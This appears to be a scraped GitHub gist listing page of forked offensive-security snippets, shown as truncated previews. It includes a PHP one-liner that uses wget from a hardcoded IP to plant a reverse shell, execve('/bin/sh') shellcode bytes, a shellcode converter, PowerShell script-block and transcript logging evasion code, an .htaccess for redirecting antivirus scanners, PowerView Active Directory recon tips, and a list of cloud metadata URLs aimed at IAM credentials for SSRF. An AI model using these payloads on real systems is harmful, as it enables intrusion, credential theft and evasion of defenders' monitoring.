start new:
tmux
start new with session name:
tmux new -s myname
0x4243
0x4243
/ ConvertShellcode.py
Created
October 24, 2018 10:48
— forked from rvrsh3ll/ConvertShellcode.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import binascii | |
| import sys | |
| file_name = sys.argv[1] | |
| with open (file_name) as f: | |
| hexdata = binascii.hexlify(f.read()) | |
| hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
| shellcode = '' | |
| for i in hexlist: | |
| shellcode += "0x{},".format(i) |
0x4243
/ Build_In_Memory_CSharp_Project.txt
Created
October 20, 2018 07:55
— forked from bohops/Build_In_Memory_CSharp_Project.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Create various tmp files | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] |
0x4243
/ .htaccess
Created
September 28, 2018 07:46
— forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RewriteEngine On | |
| RewriteOptions Inherit | |
| # Uncomment the below line for verbose logging, including seeing which rule matched. | |
| #LogLevel alert rewrite:trace5 | |
| # BURN AV BURN | |
| # Class A Exclusions. Includes large ranges from Azure & AWS | |
| # Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device |
0x4243
/ Program.cs
Created
September 28, 2018 07:39
— forked from malcomvetter/Program.cs
View all DLLs loaded into a process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| var proc = Process.GetCurrentProcess(); | |
| foreach (ProcessModule module in proc.Modules) | |
| { |
0x4243
/ PowerView-3.0-tricks.ps1
Created
September 24, 2018 10:53
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
0x4243
/ shell.php
Created
September 24, 2018 10:52
— forked from jimmy-ly00/shell.php
One liner actual PHP code reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| If you have access to executing php (and maybe LFI to visit the .php) e.g. phpLiteAdmin, but it only accepts one line so you cannot use the pentestmonkey php-reverse-shell.php | |
| 1. Use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet in place of the one liner | |
| <?php echo shell_exec("[INSERT ONE LINER");?> | |
| 2. Guess programs on machine and use LFI to visit file | |
| <?php echo shell_exec("/usr/local/bin/wget http://10.11.0.46:8000/php-reverse-shell.php -O /var/tmp/shell.php 2>&1");?> |
0x4243
/ posh.cs
Created
September 24, 2018 10:46
— forked from benpturner/posh.cs
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Security; | |
| using System.Management.Automation.Runspaces; | |
| using System.Reflection; | |
| namespace TranscriptBypass | |
| { | |
| // Compiling with CSC.exe v4.0.30319 or v3.5 |
0x4243
/ execve.c
Created
September 24, 2018 10:42
— forked from resilar/execve.c
Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes) | |
| * 31c050488b1424eb105478065e5fb03b0f05595b40b00bcd80e8ebffffff2f62696e2f736800 | |
| * | |
| * - offset - bytes 32-bit code 64-bit code | |
| * 0x00000000 31c0 xor eax, eax xor eax, eax | |
| * 0x00000002 50 push eax push rax | |
| * 0x00000003 48 dec eax rex.w | |
| * 0x00000004 8b1424 mov edx, dword [esp] mov rdx, qword [rsp] | |
| * 0x00000007 eb10 jmp 0x19 jmp 0x19 |
0x4243
/ tmux-cheatsheet.markdown
Created
September 21, 2018 11:36
— forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet
0x4243
/ cloud_metadata.txt
Created
September 13, 2018 16:03
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname |
NewerOlder